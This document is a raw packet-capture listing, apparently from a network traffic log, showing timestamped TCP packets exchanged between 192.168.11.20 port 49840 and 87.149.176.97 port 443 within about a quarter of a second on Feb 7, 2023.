                                                                                                                                                                                                              Feb 7, 2023 19:52:30.107517958 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.107558966 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.107569933 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.107637882 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.107681036 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.107831955 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.107872009 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.108030081 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.108030081 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.108083010 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.108201981 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.108201981 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.108385086 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.108437061 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.108578920 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.108758926 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.127019882 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.127146959 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.127546072 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.127659082 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.127710104 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.127737999 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.127770901 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.127971888 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.128153086 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.138042927 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.138247013 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.138391018 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.138577938 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.138623953 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.138756037 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.148931980 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.149195910 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.149390936 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.149442911 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.149486065 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.149534941 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.149543047 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.149593115 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.149743080 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.149852037 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.149923086 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.149965048 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.149991035 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.150012970 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.150022030 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.150082111 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.150109053 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.150146008 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.150321007 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.150506020 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.150506020 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.150691986 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.150691986 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.150882959 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.168332100 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.168519974 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.168575048 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.168777943 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.168827057 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.168880939 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.168916941 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.168965101 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.169151068 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.169157982 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.169294119 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.169353008 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.169353008 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.169416904 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.169429064 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.169521093 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.169559956 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.170114994 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.170171976 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.170325994 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.170418978 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.170583963 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.170676947 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.187426090 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.187478065 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.187625885 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.187772989 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.187958956 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.187973976 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.188199043 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.188390017 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.188390017 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.188582897 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.188750982 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.188958883 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.188958883 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.208764076 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.209037066 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.209245920 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.209295034 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.209358931 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.209407091 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.209552050 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.209703922 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.209791899 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.209811926 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.209813118 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.209950924 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.210007906 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.210007906 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.210062027 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.210163116 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.210195065 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.210375071 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.210376024 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.210865974 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.210915089 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.229818106 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.229887962 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.230110884 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.230163097 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.230235100 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.230308056 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.230459929 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.230496883 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.230551958 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.230585098 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.230654955 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.230679035 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.230679989 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.230776072 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.230931044 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.230931044 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.230993986 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.231057882 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.231077909 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.231128931 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.231260061 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.231463909 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.231642962 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.231684923 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.231818914 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.249988079 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.250263929 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.250463009 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.250518084 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.250549078 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.250605106 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.250617027 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.250695944 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.250807047 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.250905991 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.250987053 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.251034021 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.251034021 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.251089096 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.251153946 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.251183987 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.251225948 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.251338959 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.251374006 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.251400948 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.251558065 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.251560926 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.251743078 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.251749992 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.251780033 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.251949072 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.251981020 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.252140045 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.252341986 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.269241095 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.269426107 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.269601107 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.269666910 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.269706011 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.269763947 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.269771099 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.269808054 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.269979000 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.270025969 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.270066023 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.270090103 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.270138979 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.270374060 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.270374060 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.270411968 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.270582914 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.270725965 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.270889044 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.271087885 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.289516926 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.289558887 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.289717913 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.289779902 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.289823055 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.289853096 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.289897919 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.290066004 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.290121078 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.290256977 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.290256977 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.290311098 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.290379047 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.290396929 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.290427923 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.290826082 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.291090012 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.291182995 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.291367054 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.291435003 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.291552067 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.310240984 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.310264111 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.310487986 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.310539007 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.310549974 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.310590982 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.310637951 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.310791016 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.310801029 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.310980082 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.311012983 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.311183929 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.311389923 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.311423063 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.311556101 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.311738968 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.311757088 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.330890894 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.330943108 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.331250906 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.331306934 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.331377029 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.331435919 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.331439018 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.331573009 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.331629038 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.331666946 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.331695080 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.331732988 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.332048893 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.332102060 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.332212925 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.332361937 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.332561970 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.332562923 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.332750082 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.332918882 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.350694895 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.350784063 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.350986004 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.351041079 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.351070881 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.351119995 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.351134062 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.351254940 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.351336002 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.351387024 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.351521015 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.351521015 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.351577044 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.351643085 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.351713896 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.351713896 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.351799965 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.351886034 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.351911068 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.352102995 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.352147102 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.352283001 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.352353096 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.352473021 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.352665901 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.352848053 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.370213985 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.370450974 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.370635033 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.370668888 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.370697975 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.370732069 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.370784044 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.370825052 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.370946884 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.370978117 CET4434984087.149.176.97192.168.11.20
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.371141911 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.371141911 CET49840443192.168.11.2087.149.176.97
                                                                                                                                                                                                              Feb 7, 2023 19:52:30.371180058 CET4434984087.149.176.97192.168.11.20
